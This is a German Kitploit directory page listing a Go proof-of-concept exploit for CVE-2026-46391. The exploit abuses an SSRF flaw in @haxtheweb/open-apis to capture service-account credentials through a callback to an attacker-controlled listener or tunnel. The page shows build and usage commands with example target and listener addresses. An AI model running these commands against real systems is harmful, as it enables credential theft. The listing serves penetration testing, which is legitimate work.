Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-46391 — Proof-of-Concept-Exploit für CVE-2026-46391 | Kitploit
Tools/GitHubGitHub/bradyjmcl/cve-2026-46391
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubbradyjmcl/cve-2026-46391

cve-2026-46391

Proof-of-Concept-Exploit für CVE-2026-46391

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-46391 - Credential-Exposition durch SSRF in @haxtheweb/open-apis

test

Proof of Concept für CVE-2026-46391. Löst die SSRF-Schwachstelle im cacheAddress-Endpunkt von @haxtheweb/open-apis aus und erfasst die Servicekonto-Anmeldeinformationen, die im Callback gesendet werden.

Erstellung

root@kitploit:~
go build -o cve-2026-46391 .

Test

root@kitploit:~
go test ./...

Verwendung

root@kitploit:~
./cve-2026-46391 -u <web-root> -l <listener> [-p port] [-t seconds] [-v]

Optionen

Beispiele

Direkt (gleiches Netzwerk wie das Ziel):

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201

Über VPS/Cloudflare-Tunnel/usw.:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com

Benutzerdefinierter Port und Timeout:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60
Tool herunterladen
FlagBeschreibungStandard
-u, --urlZiel-Web-Root (z.B. http://10.10.0.80:3000)erforderlich
-l, --listenerIhre IP/Rechnername oder Tunnel-URL (z.B. 192.168.1.10, https://uuid.trycloudflare.com)erforderlich
-p, --portLokaler Port, auf dem gehört wird8080
-t, --timeoutSekunden, die auf den Callback gewartet werden30
-v, --verboseKopfzeilen und Inhalt jeder eingehenden Anfrage ausgebenaus